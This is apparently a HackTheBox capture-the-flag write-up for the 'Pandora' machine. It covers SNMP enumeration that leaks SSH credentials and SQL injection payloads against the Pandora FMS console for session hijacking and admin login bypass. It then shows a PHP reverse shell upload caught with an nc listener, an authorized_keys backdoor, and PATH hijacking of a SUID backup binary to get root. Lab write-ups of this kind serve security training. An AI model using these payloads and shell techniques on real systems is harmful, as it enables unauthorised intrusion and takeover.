Pandora - [HTB]

Cover Image for Pandora - [HTB]

Table of Contents


    Pandora is an easy Linux machine from HackTheBox where you will enumerate the snmp service in order to find a command with credentials pass as parameters. These credentials can be used to gain access to the machine as daniel. Then, there is a Pandora service only available through localhost requiring port forwarding in order to exploit several vulnerabilities for the pandora's version. Finally, you will have to exploit a path hijacking weakness on a SUID to become root.


    As always, let's start scanning all opened ports in the box with Nmap.

    kali@kali:~/Documents/HTB/Pandora$ nmap -vv -sS -p- -n -T5 -oN AllPorts.txt
    Nmap scan report for
    Host is up, received echo-reply ttl 63 (0.18s latency).
    Scanned at 2022-01-10 11:41:31 EST for 229s
    Not shown: 65533 closed ports
    Reason: 65533 resets
    22/tcp open  ssh     syn-ack ttl 63
    80/tcp open  http    syn-ack ttl 63
    kali@kali:~/Documents/HTB/Pandora$ sudo nmap -sU -sC -sV
    Nmap scan report for
    Host is up (0.17s latency).
    Not shown: 916 closed ports, 83 open|filtered ports
    161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
    | snmp-info:
    |   enterprise: net-snmp
    |   engineIDFormat: unknown
    |   engineIDData: 48fa95537765c36000000000
    |   snmpEngineBoots: 31
    |_  snmpEngineTime: 4h00m19s
    | snmp-interfaces:
    |   lo
    |     IP address:  Netmask:
    |     Type: softwareLoopback  Speed: 10 Mbps
    |     Traffic stats: 1.26 Mb sent, 1.26 Mb received
    |   VMware VMXNET3 Ethernet Controller
    |     IP address:  Netmask:
    |     MAC address: 00:50:56:b9:c2:f0 (VMware)
    |     Type: ethernetCsmacd  Speed: 4 Gbps
    |_    Traffic stats: 5.74 Mb sent, 6.19 Mb received
    | snmp-netstat:
    |   TCP 
    |   TCP
    |   TCP
    |   TCP
    |   UDP           *:*
    |   UDP          *:*
    |_  UDP        *:*
    | snmp-processes:
    | snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
    |_  System uptime: 4h00m19.29s (1441929 timeticks)
    Service Info: Host: pandora

    Then, we continue with a deeper scan of every opened port, getting more information about each service.

    kali@kali:~/Documents/HTB/Pandora$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 22,80
    Nmap scan report for
    Host is up (0.045s latency).
    22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
    |   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
    |_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
    80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
    |_http-server-header: Apache/2.4.41 (Ubuntu)
    |_http-title: Play | Landing
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Looking for domains on the web page for being added to /etc/hosts, we obtain the following.

    kali@kali:~/Documents/HTB/Pandora$ curl 2>/dev/null | grep \.htb

    Accessing the web page, we can read about a monitoring solution.

    Panda web page

    Because the UDP port 161 is open, let's use snmpwalk to enumerate the service, finding a command with some credentials as parameters.

    kali@kali:~/Documents/HTB/Pandora$ snmpwalk -v 2c panda.htb -c public | tee snmpwalk.txt
    HOST-RESOURCES-MIB::hrSWRunParameters.972 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"

    These credentials can be used for access as the user Daniel through SSH.

    Privilege Escalation 1

    We can find a virtual host only available via localhost by enumerating the machine.

    daniel@pandora:~$ cat /etc/apache2/sites-available/pandora.conf 
    <VirtualHost localhost:80>
      ServerAdmin admin@panda.htb
      ServerName pandora.panda.htb
      DocumentRoot /var/www/pandora
      AssignUserID matt matt
      <Directory /var/www/pandora>
        AllowOverride All
      ErrorLog /var/log/apache2/error.log
      CustomLog /var/log/apache2/access.log combined

    To do so, we need to execute the following command.

    kali@kali:~/Documents/HTB/Pandora$ ssh -L localhost:80:localhost:80 daniel@panda.htb -fN

    Now we have access to pandora's console.

    Pandora console

    As we can see above, the pandora's version number is on the landing page. So looking for vulnerabilities, you can find the following post, which explains the SQLi login bypass. However, it doesn't show the payload in the Proof Of Concept.

    There are two ways of exploiting this part:

    1. Thanks to the SQLi, we can obtain mat's PHPSESSIONID, leading us to log in as matt. Then, we will need to use another exploit to get RCE.
    2. Thanks to the SQLi and the PHP deserialisation, we can log in as admin, uploading a PHP reverse shell.

    Exploitation 1

    The payload to log in as matt is the following.

    http://localhost/pandora_console/include/chart_generator.php?session_id=' OR `id_session`=(SELECT id_session from tsessions_php where data like '%matt%' LIMIT 1) LIMIT 1 -- -

    Then, this post explains how to obtain Remote Command Execution Via the Events Feature

    Exploitation 2

    The payload to log in as admin is the following:

    http://localhost/pandora_console/include/chart_generator.php?session_id=-1' UNION SELECT '<YOUR_PHPSESSIONID>', NULL, 'id_usuario|s:5:"admin";

    Now, if we access to Admin tools/File Manager we can upload any file like /usr/share/laudanum/php/php-reverse-shell.php that will be stored under the /images/ directory.

    kali@kali:~/Documents/HTB/Pandora$ curl -s & http://localhost/pandora_console/images/shell.php
    kali@kali:~/Documents/HTB/Pandora$ nc -nlvp 443
    listening on [any] 443 ...
    connect to [] from (UNKNOWN) [] 34170
    Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
     21:23:15 up  7:56,  1 user,  load average: 0.00, 0.00, 0.00
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    daniel   pts/0     17:29   35.00s  0.72s  0.72s -bash
    uid=1000(matt) gid=1000(matt) groups=1000(matt)

    Privilege Escalation

    Thanks to linpeas, we can see a SUID binary that can only be executed as the user matt.

    ╔══════════╣ SUID - Check easy privesc, exploits and write perms
    -rwsr-x--- 1 root   matt        17K Dec  3 15:58 /usr/bin/pandora_backup (Unknown SUID binary)

    With ltrace, we can see that it doesn't use an absolute path for executing the tar command. Hence, we can do path hijacking to become root.

    matt@pandora:/$ ltrace /usr/bin/pandora_backup
    getuid()= 1000
    geteuid()= 1000
    setreuid(1000, 1000)= 0
    puts("PandoraFMS Backup Utility"PandoraFMS Backup Utility)= 26
    puts("Now attempting to backup Pandora"...Notow attempting to backup PandoraFMS client)= 43
    system("tar -cvf /root/.backup/pandora-b"...tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
    tar: Error is not recoverable: exiting now
     <no return ...>
    --- SIGCHLD (Child exited) ---
    <... system resumed> )                                                                           = 512
    puts("Backup failed!\nCheck your permis"...Backup failed!
    Check your permissions!
    )                                                     = 39
    +++ exited (status 1) +++

    However, we need to access the machine as matt through SSH in order to make it work.

    matt@pandora:/home/matt$ mkdir /home/matt/.ssh/
    matt@pandora:/home/matt$ chmod 0700 .ssh
    matt@pandora:/home/matt$ echo "<>" > /home/matt/.ssh/authorized_keys
    matt@pandora:/home/matt$ chmod 0600 /home/matt/.ssh/authorized_keys
    kali@kali:~/Documents/HTB/Pandora$ ssh matt@panda.htb

    Finally, once logged in, we can become root executing the following commands.

    matt@pandora:~$ cd /tmp/
    matt@pandora:/tmp$ echo "/bin/bash -p" > tar
    matt@pandora:/tmp$ chmod +x tar
    matt@pandora:/tmp$ export $PATH=$(pwd):$PATH
    matt@pandora:/tmp$ /usr/bin/pandora_backup 
    PandoraFMS Backup Utility
    Now attempting to backup PandoraFMS client
    root@pandora:/tmp# id
    uid=0(root) gid=1000(matt) groups=1000(matt)
    root@pandora:/tmp# cat /root/root.txt